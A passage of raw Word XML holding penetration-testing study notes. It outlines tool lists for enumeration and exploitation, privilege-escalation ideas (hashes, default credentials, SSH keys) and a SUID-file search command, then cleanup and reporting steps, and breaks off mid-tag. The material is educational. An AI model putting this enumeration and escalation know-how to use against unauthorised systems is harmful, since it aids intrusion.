    <w:p w14:paraId="3EEA66C3" w14:textId="13C9DE2A" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Nmap, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>, Metasploit, exploit-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="425CBA63" w14:textId="1C608831" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Determine overall attack surface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E558C9B" w14:textId="67289EFF" w:rsidR="001779ED" w:rsidRPr="0084205E" w:rsidRDefault="001779ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Determines what the target might be vulnerable to in the exploitation phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C688790" w14:textId="39C0115E" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Improper lockdown, info leaks, SQL Injections, XSS, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1867198B" w14:textId="7128CB40" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Determine what ports are open, OS, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>services</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450A5867" w14:textId="32BD350C" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – commonly-named directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA8D644" w14:textId="386DEDF2" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C4E1E53" w14:textId="06DB7905" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enum4linux – helps find vulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBE5E41" w14:textId="7C2A8577" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1168E86D" w14:textId="4FAA438A" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Burp suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EDD65B" w14:textId="750F3E7F" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DD72D7" w14:textId="426A308A" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Only as good as recon and enumeration phases before it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED4EB3B" w14:textId="14FA905D" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Must enumerate all vulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B80ED0B" w14:textId="5901F149" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Metasploit, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A925A95" w14:textId="701F7DB4" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032667D8" w14:textId="7CE17EB0" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Higher user account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C63366" w14:textId="30FA091F" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Administrator or system for windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033CC574" w14:textId="77228965" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Root for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02FDD936" w14:textId="04D2E0BE" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Discover OS first to determine privilege escalation methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29048CF3" w14:textId="1A9AD0CC" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Password cracking hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4048DC07" w14:textId="6AE7A723" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Vuln services or versions through service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5403D5B0" w14:textId="13377BC3" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Default credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52939E03" w14:textId="08A91773" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Secret keys or SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F53F63" w14:textId="40D6517C" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Running scripts or commands to enumerate system settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7900CBFF" w14:textId="79CD33E1" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACD4153" w14:textId="693191B9" w:rsidR="00875A24" w:rsidRPr="0084205E" w:rsidRDefault="00875A24" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Find / -perm</w:t>
      </w:r>
      <w:r w:rsidR="00662D83" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB04598" w14:textId="13AA178F" w:rsidR="00662D83" w:rsidRPr="0084205E" w:rsidRDefault="00662D83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Covering Tracks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F567454" w14:textId="33C32A57" w:rsidR="00662D83" w:rsidRPr="0084205E" w:rsidRDefault="00BD6ED0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Assist in cleaning up exploit code and recommend methods to prevent attacks in the future</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613C0DFE" w14:textId="5A4F26C6" w:rsidR="00BD6ED0" w:rsidRPr="0084205E" w:rsidRDefault="00BD6ED0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Carefully track and notate </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> the tasks performed as part of the penetration test to assist in fixing vulnerabilities and recommending changes to the system owner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298F5425" w14:textId="6FD54253" w:rsidR="00BD6ED0" w:rsidRPr="0084205E" w:rsidRDefault="00BD6ED0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635E6050" w14:textId="23B83223" w:rsidR="00BD6ED0" w:rsidRPr="0084205E" w:rsidRDefault="00BD6ED0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Findings and Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C683B6F" w14:textId="3E0F7802" w:rsidR="00BD6ED0" w:rsidRPr="0084205E" w:rsidRDefault="00BD6ED0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Criticality of the findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727BCBD4" w14:textId="51333D87" w:rsidR="00BD6ED0" w:rsidRPr="0084205E" w:rsidRDefault="00BD6ED0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Description or brief overview of how the finding was discovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CC3A23" w14:textId="30B0032D" w:rsidR="00BD6ED0" w:rsidRPr="0084205E" w:rsidRDefault="00BD6ED0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Remediation recommendations to resolve finding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B76B0FC" w14:textId="4A3C885A" w:rsidR="00BD6ED0" w:rsidRPr="0084205E" w:rsidRDefault="00BD6ED0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Three formats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F47C595" w14:textId="1B8565F0" w:rsidR="00BD6ED0" w:rsidRPr="0084205E" w:rsidRDefault="00BD6ED0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Vuln scan results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A46B3F" w14:textId="611EC5B3" w:rsidR="00BD6ED0" w:rsidRPr="0084205E" w:rsidRDefault="00BD6ED0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Findings</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> summary list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74933C84" w14:textId="3F3140DA" w:rsidR="00BD6ED0" w:rsidRPr="0084205E" w:rsidRDefault="00BD6ED0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Full formal report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F91B96B" w14:textId="7BDBDE96" w:rsidR="001E34DD" w:rsidRPr="0084205E" w:rsidRDefault="001E34DD" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E7A3B81" w14:textId="7FC80934" w:rsidR="001E34DD" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Windows File System and Permissions Explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0937B540" w14:textId="74515EE4" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Windows File System Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B25706" w14:textId="689EF05D" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Logical Drives (C:)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34780DBE" w14:textId="74127708" w:rsidR="00461F6A" w:rsidRPr="0084205E" w:rsidRDefault="00461F6A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
